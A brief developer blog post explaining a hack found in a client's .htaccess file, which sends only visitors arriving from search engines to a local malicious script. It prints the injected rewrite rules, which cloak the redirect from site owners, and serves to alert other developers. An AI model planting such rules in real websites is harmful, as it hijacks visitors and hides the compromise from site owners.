Hacked .htaccess file: Redirecting visits from search engine referrals

During the course of managing websites, developers end up coming across a variety of hacks. I recently found one on a server which puzzled me, and is one every web developer should be aware of.

The reported issue was that when the client’s business was searched on Google, and the user clicked the link, they were taken to an unexpected location. However, if the URL was entered manually or clicked from another location, everything was fine. Instinctively it felt like this wasn’t a problem with Google search. Normally I would expect a hack of this type to occur on the website software side (in this case WordPress), but there wasn’t anything out of the ordinary there either.

Thinking along the line of redirects, I checked the .htaccess file and that’s where I discovered this bit of inserted code:

RewriteBase /
 RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
 RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
 RewriteCond %{HTTP_HOST} <client-domain>.com$
 RewriteRule . hacked-file.php [L,S=10000]

Clever. The hack is only activated when the user clicked through to the website from one of the common search engines (Google, Yahoo, MSN, AOL, Bing), something a site owner or manager wouldn’t normally do, making it much less likely to be found quickly. It then ran a local script that did the actual redirecting of the user.

Watch for other search engines being added to this list as they gain more popularity, especially privacy-focused ones.